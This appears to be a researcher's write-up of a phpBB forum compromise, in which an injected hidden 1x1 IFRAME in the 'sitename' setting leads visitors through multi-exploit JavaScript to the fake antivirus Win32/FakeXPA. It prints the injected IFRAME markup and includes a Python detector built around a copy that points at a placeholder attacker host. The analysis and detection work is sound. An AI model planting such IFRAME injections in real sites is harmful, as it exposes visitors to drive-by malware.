(often known as "Antivirus 2009").

One night while browsing, a message box popped up asking me to do a "security scan". As a researcher, I wouldn't let this pass me by. After going through my opened tabs I narrowed down the culprit to a forum I had open at the time.

"View Source" showed a 1x1 pixel IFRAME pointing to hxxp://***.info/users/***/1.php

The position of this IFRAME is a little strange. It appears several times on the page, each time right after the title of the forum. It appeared to me that some kind of template variable was being replaced with malicious content. It even breaks the HTML where this variable is used outside a <title> tag:

iframe source

After a crash course on phpBB, I found out that phpBB stores its entire configuration in the database. In our case, it seems that the following string is concatenated to the content of config_value "sitename":

</title><iframe src=http://***.info/users/***/1.php width=1 height=1></iframe>

I ran some web searches and found that at least 300 or so sites contain the same injected IFRAME at the same location.

While I don't have concrete evidence, my bet is that all these sites were attacked by an automated SQL-injection attack.
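As an added example (not code from the original post), the following Python script reproduces the symptom described above so that a forum administrator can check for it: it splices a tainted "sitename" value into a simplified stand-in for a phpBB page template, then scans the rendered HTML for hidden 1x1 IFRAMEs and checks whether the raw config value contains any markup at all. The attacker host, the page template and the sample values are constructed placeholders, not the ones from the post.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a phpBB "sitename" config value tainted exactly the way the
# post describes. The host is a placeholder, not the real one observed.
TAINTED_SITENAME = (
    "</title><iframe src=http://attacker.example/users/x/1.php "
    "width=1 height=1></iframe>"
)
CLEAN_SITENAME = "My Forum"


def render_page(sitename):
    """Simplified stand-in for a phpBB template (an assumption, not phpBB's own code):
    the sitename is spliced into the <title> and again into the page header."""
    return (
        "<html><head><title>" + sitename + " :: Index</title></head>"
        "<body><h1>" + sitename + "</h1><p>Welcome</p></body></html>"
    )


class IframeFinder(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def suspicious_iframes(html):
    """Return the src of every iframe with a 0 or 1 pixel dimension.
    A legitimate page has no reason to embed an invisible frame; the injected
    one in the post used width=1 height=1."""
    parser = IframeFinder()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        width = (attrs.get("width") or "").strip()
        height = (attrs.get("height") or "").strip()
        if width in ("0", "1") or height in ("0", "1"):
            hits.append(attrs.get("src"))
    return hits


def config_value_is_tainted(value):
    """A forum sitename should be plain text. Any tag-like sequence means the
    stored config value has been modified (e.g. by SQL injection).

    To pull the live value, run against the forum database (table prefix
    "phpbb_" assumed):
        SELECT config_value FROM phpbb_config WHERE config_name = 'sitename';
    """
    return re.search(r"<\s*/?\s*[A-Za-z]", value) is not None


if __name__ == "__main__":
    for name in (CLEAN_SITENAME, TAINTED_SITENAME):
        page = render_page(name)
        print("config tainted:", config_value_is_tainted(name),
              "| hidden iframes:", suspicious_iframes(page))
```

Because the injected string begins with `</title>`, the parser sees the IFRAME wherever the template prints the sitename, so the tainted page yields one hit per occurrence; the clean page yields none.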

Now that we had found the culprit, I opened up my virtual machine and dropped the URL in. Sure enough, after several seconds, a dialog popped up and the IE process crashed. It was our old friend Win32/FakeXPA.

Digging through the network capture was fun. The attack seemed to be browser-specific. (On my initial visit, I only got a message box asking me to manually download a "security scan program".) Here's a rough summary of the attack observed in the virtual machine:

  1. The IFRAME redirects the user through 2 HTTP redirections.
  2. The final destination contains a heavily obfuscated JavaScript. The script contains 9 different "attack recipes" and simply loops through them until one of them succeeds.
  3. If any of the exploits succeeds, a small downloader is downloaded and launched.
  4. This downloader queries the central server for additional instructions. In my trial, it was instructed to download the installer/downloader for Win32/FakeXPA.

    HTTP traffic
  5. Curiously, the Win32/FakeXPA installer still asks for user consent to continue the installation. Add to that the fact that the installer displays a shield and a Microsoft Windows logo in the corner, and its "terms and conditions" link points to a site with a clean design. The whole "experience" may appear somewhat legitimate to the end user.

    Win32/FakeXPA Screenshot

In the multi-exploit JavaScript, the following exploits were used:

  • MDAC remote code execution (MS06-014)
  • ShockwaveFlash.ShockwaveFlash.9 exploit
  • WebViewFolderIcon setSlice() exploit (MS06-057)
  • Msdds.dll exploit (MS05-052)
  • Microsoft Works exploit (MS08-052)
  • Creative Software AutoUpdate Engine exploit
  • Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow
  • Ourgame GLWorld GLIEDown2.dll exploit
  • DirectAnimation.PathControl buffer overflow (MS06-067)

So there you have it, this looks like a fairly complex malware distribution operation.

One day later, when I tried the same exploit destination, it had already stopped serving malicious content. When I launched the first stage downloader, the control server stopped giving instructions to download the second stage installer. Strange…

--Yuhui Huang